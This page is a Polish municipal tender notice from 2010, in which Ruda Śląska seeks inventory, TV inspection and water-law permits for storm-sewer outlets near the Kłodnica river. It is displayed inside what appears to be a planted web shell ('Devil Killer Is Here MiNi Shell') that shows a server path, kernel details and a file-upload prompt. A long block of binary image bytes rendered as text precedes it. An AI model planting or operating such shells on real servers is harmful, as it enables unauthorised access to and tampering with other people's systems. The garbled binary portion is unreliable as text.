JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101001/271141-N-2010.html

<p class="kh_header"><b>Ruda Śląska: Inwentaryzacja sieci kanalizacji deszczowej wraz z wykonaniem operatów wodnoprawnych oraz uzyskanie pozwoleń wodnoprawnych na odprowadzenie wód opadowych istniejącymi wylotami do rzeki Kłodnicy w rejonie osiedla Halemba II w Rudzie Ślaskiej</b><br>
<b>Numer ogłoszenia: 271141 - 2010; data zamieszczenia: 01.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9; 2449094, faks 032 248 7348.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inwentaryzacja sieci kanalizacji deszczowej wraz z wykonaniem operatów wodnoprawnych oraz uzyskanie pozwoleń wodnoprawnych na odprowadzenie wód opadowych istniejącymi wylotami do rzeki Kłodnicy w rejonie osiedla Halemba II w Rudzie Ślaskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Inwentaryzacja sieci kanalizacji deszczowej wraz z wykonaniem operatów wodnoprawnych oraz uzyskanie pozwoleń wodnoprawnych na odprowadzanie wód opadowych istniejącymi wylotami do rzeki Kłodnicy w rejonie osiedla Halemba II w Rudzie Śląskiej
Zadanie zostało podzielone na  - 2 części/zadania.
1)Przedmiot zamówienia obejmuje:
-wykonanie przed przystąpieniem do inwentaryzacji, czyszczenia kanalizacji deszczowej wraz z wpustami ulicznymi, inspekcję TV kanalizacji oraz przykanalików wpustów ulicznych wraz z określeniem ich stanu technicznego, 
-wykonanie inwentaryzacji kanalizacji deszczowej, wylotów kanalizacyjnych do rzeki, studni kanalizacji deszczowej oraz studni wpustów ulicznych z aktualizacją kart studni kanalizacyjnych oraz utworzenie kart studni wpustów ulicznych,
-wykonanie operatu wodnoprawnego wraz z uzyskaniem decyzji na odprowadzanie wód opadowych oraz roztopowych z przedmiotowego terenu (pozwolenie wodnoprawne). 
2)Zakres przedmiotu zamówienia obejmuje wyloty z podziałem na następujące części/zadania:
zadanie I	Inwentaryzacja trzech sieci kanalizacji deszczowej wraz z ich wylotami umieszczonymi na działkach o numerach geodezyjnych: 
	- wylot nr 1 - 2863-81 i  około 2200 mb kanalizacji,
	- wylot nr 2 - 1310-   i  około   500 mb kanalizacji, 
	- wylot nr 3 - 1333-13 i  około   500 mb kanalizacji.
(na podstawie mapy z orientacyjnym przebiegiem kanalizacji otrzymanej od Zamawiającego)
zadanie II	Inwentaryzacja dwóch sieci kanalizacji deszczowej wraz z ich wylotami umieszczonymi na działkach o numerach geodezyjnych:
- wylot nr 4 - 1022-3    i około 1700 mb kanalizacji, 
	- wylot nr 5 - 1333-13  i około 1550 mb kanalizacji. 
(na podstawie mapy z orientacyjnym przebiegiem kanalizacji otrzymanej od Zamawiającego).
2.Zakres rzeczowy przedmiotu zamówienia obejmuje: 
1)Określenie aktualnego stanu technicznego kanalizacji polegające na:
-Wykonaniu kompleksowego czyszczenia kanalizacji deszczowej wraz z wszystkimi studniami na ciągu głównym będące we władaniu Miasta Ruda Śląska oraz wszystkich wpustów ulicznych wraz z przykanalikami;   
-Wykonaniu przeglądu TV kanalizacji deszczowej z określeniem średnic poszczególnych odcinków wraz z określeniem ich spadków;
-Wykonaniu przeglądu TV wraz z określeniem średnicy przykanalików wpustów ulicznych;
-Sporządzeniu opinii budowlanej dotyczącej stanu technicznego wylotów, istniejącej kanalizacji deszczowej, studni rewizyjnych wraz z wpustami ulicznymi oraz przykanalikami;
-Wykonanie dokumentacji fotograficznej stanu aktualnego wylotów kanalizacyjnych; 
-Wskazanie ewentualnych miejsc nielegalnych podłączeń kanalizacji sanitarnej lub ogólnospławnej do kanalizacji deszczowej.
2)Inwentaryzację sieci kanalizacji obejmującą:
-Inwentaryzację ciągu kanalizacyjnego wraz ze studniami, przyłączami oraz wpustami ulicznymi - wykonanie na mapie sytuacyjno wysokościowej, 
-Inwentaryzację studni kanalizacyjnych (opracowanie lub aktualizacja kart studni. Należy wyszczególnić w opisie rodzaj studni. (Studnia kanalizacji deszczowej),
-Inwentaryzację wpustów ulicznych (opracowanie kart studni)
-Inwentaryzację wylotów posadowionych na działkach o numerze geodezyjnym 2863/81,  1310-3, 1333-13, 1022-3 - (w zależności od zadania)  wykonanie, na mapie sytuacyjno wysokościowej,
-naniesienie na zasób geodezyjny wszystkich elementów kanalizacji deszczowej odprowadzającej wody do wylotów.
-Profil podłużny ciągu kanalizacji deszczowej w stanie istniejącym oraz profil podłużny kanalizacji uwzględniającej prognozowane osiadanie terenu do 2020 roku,
-Dokładne określenie zlewni oraz powierzchni szczelnej ciążącej na kanalizacji deszczowej,
-Zasadnicze przekroje podłużne i poprzeczne urządzeń odprowadzających wodę,
-Do określenie możliwości hydraulicznych zinwentaryzowanej kanalizacji deszczowej oraz wylotów. Należy przyjąć natężenie deszczu miarodajnego dla czasu trwającego 15 minut 231,7 l[/s*ha]
-Powierzchnię zlewni należy rozdzielić na: drogi i parkingi o powierzchni szczelnej, dachy oraz pozostałe tereny (wszystkie wartości należy podać w metrach kwadratowych). 
-Wykonanie inwentaryzacji oraz operatu wodnoprawnego wraz z uzyskanie pozwolenia wodnoprawnego należy wykonać osobno dla każdego wylotu.
3)Opracowanie operatu wodnoprawnego wraz z uzyskaniem pozwolenia wodnoprawnego:
-Opracowanie operatu wodnoprawnego zgodnie z ustawą Prawo Wodne z dnia 18 lipca 2001 r. (Dz. U. z 2005 r. Nr 239 poz. 2019 z późn. zm.) na odprowadzenie wód opadowych i roztopowych  do  istniejącego odbiornika,  zgodnie z ustawą Prawo wodne z dnia 18 lipca 2001 r. (Dz. U. z 2005 r. Nr 239 poz. 2019 z późn. zm.) i  rozporządzeniem Ministra Środowiska z dnia 24. lipca 2006 r. w sprawie warunków, jakie należy spełnić przy wprowadzeniu ścieków do wód lub ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz. U. z 2006. Nr 137 poz. 984 z póżn. zm.); 
-Uzyskanie pozwolenia wodnoprawnego na odprowadzanie wód opadowych i roztopowych,
-Wykonawca złoży wnioski o wydanie pozwolenia wodnoprawnego, do których dołączy kompletny operat wraz z uzyskanymi zgodami właścicieli działek, na które będą odprowadzane wody opadowe.
-Zamawiający posiada aktualną Decyzję - pozwolenie wodnoprawne dla wylotu umieszczonego na działce o numerze geodezyjnym 1333/13 (wylot nr 5), natomiast Wykonawca zobowiązany będzie do dokonania aktualizacji przedmiotowej decyzji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.21.00-2, 90.64.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga w niniejszym postępowaniu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
-1 usługę polegającą na inwentaryzacji kanalizacji deszczowej i/lub ogólnospławnej, na kwotę co najmniej 30 000,00 zł brutto każda oraz
-1 usługę polegającą na założeniu geodezyjnej ewidencji sieci uzbrojenia terenu, na kwotę min 10 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie: co najmniej 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie o którym mowa w art. 43 pkt 1 ustawy Prawo geodezyjne i kartograficzne (tekst jednolity Dz.U. z 2005 r., nr 240 poz. 2027 
z późn. zmianami), lub której uprawnienia zostały uznane zgodnie z postanowieniem ustawy z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach czlonkowskich Unii Europejskiej (Dz.U. Nr 64 poz. 394
- co najmniej 1 osobą posiadającą przygotowanie zawodowe do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie projektowania sieci wodociągowych i kanalizacyjnych i posiadającą aktualny dokument potwierdzający przynależność do właściwego samorządu zawodowego zgodnie z przepisami ustawy 
z dnia 15.12.2000 r. o samorządach zawodowych, architektów, inżynierów budowlanych oraz urbanistów (Dz.U. z 2001 r. Nr 5 poz.42 z póz.zm.)  lub spełniającą warunki  o których mowa w art.12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156, poz.1118 z poźn.zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie, że wykonawca zapoznał się z warunkami zamówienia i z złożonym wzorem umowy oraz, że przyjmuje ich treśc bez żadnych zastrzeżeń. 2. Pełnomocnictwo ustanowione do reprezentowania wykonawcy/ów ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodnośc z oryginałem notarialnie. W przypadku podmiotów wspólnie ubiegających sie o zamówienie, pełnomocnictwo takie może wynikać z dołączonych do oferty umowy konsorcjum lub umowy spółki cywilnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje mozliwość zmiany istotnych postanowień umowy w stosunku do treści oferty, na postawie której dokonano wyboru wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiącym załącznik nr 7 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudaslaska.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309)
plac Jana Pawła II nr 6
41-709 Ruda Śląska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2010 godzina 10:00, miejsce: Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309)
plac Jana Pawła II nr 6
41-709 Ruda Śląska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Z uwagi na opis dokonania oceny spełniania warunku Zamawiający nie wymaga podania doświadczenia w wykazie osób, o którym mowa w sekcji III 4.1 2. Z uwagi na opis sposobu dokonania oceny spełniania warunków w zakresie wiedzy i doświadczenia Zamawiający wymaga wykazania usług wykonanych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Inwentaryzacja trzech sieci kanalizacji deszczowej wraz z wylotami umieszczonymi na działkach o numerach geodezyjnych: - wylot nr 1 - 2863/81 i ok. 2200 mb kanalizacji; - wylot nr 2 - 1310/3 i ok. 500mb kanalizacji; - wylot nr 3 - 1333/13 i ok.500 mb kanalizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
-wykonanie przed przystąpieniem do inwentaryzacji, czyszczenia kanalizacji deszczowej wraz z wpustami ulicznymi, inspekcję TV kanalizacji oraz przykanalików wpustów ulicznych wraz z określeniem ich stanu technicznego, 
-wykonanie inwentaryzacji kanalizacji deszczowej, wylotów kanalizacyjnych do rzeki, studni kanalizacji deszczowej oraz studni wpustów ulicznych z aktualizacją kart studni kanalizacyjnych oraz utworzenie kart studni wpustów ulicznych,
-wykonanie operatu wodnoprawnego wraz z uzyskaniem decyzji na odprowadzanie wód opadowych oraz roztopowych z przedmiotowego terenu (pozwolenie wodnoprawne).
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.21.00-2, 90.64.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Inwentaryzacja dwóch sieci kanalizacji deszczowej wraz z ich wylotami umieszczonymi na działkach o numerach geodezyjnych:
- wylot nr 4 - 1022/3    i około 1700 mb kanalizacji, 
- wylot nr 5 - 1333/13  i około 1550 mb kanalizacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
-wykonanie przed przystąpieniem do inwentaryzacji, czyszczenia kanalizacji deszczowej wraz z wpustami ulicznymi, inspekcję TV kanalizacji oraz przykanalików wpustów ulicznych wraz z określeniem ich stanu technicznego, 
-wykonanie inwentaryzacji kanalizacji deszczowej, wylotów kanalizacyjnych do rzeki, studni kanalizacji deszczowej oraz studni wpustów ulicznych z aktualizacją kart studni kanalizacyjnych oraz utworzenie kart studni wpustów ulicznych,
-wykonanie operatu wodnoprawnego wraz z uzyskaniem decyzji na odprowadzanie wód opadowych oraz roztopowych z przedmiotowego terenu (pozwolenie wodnoprawne).
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.21.00-2, 90.64.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com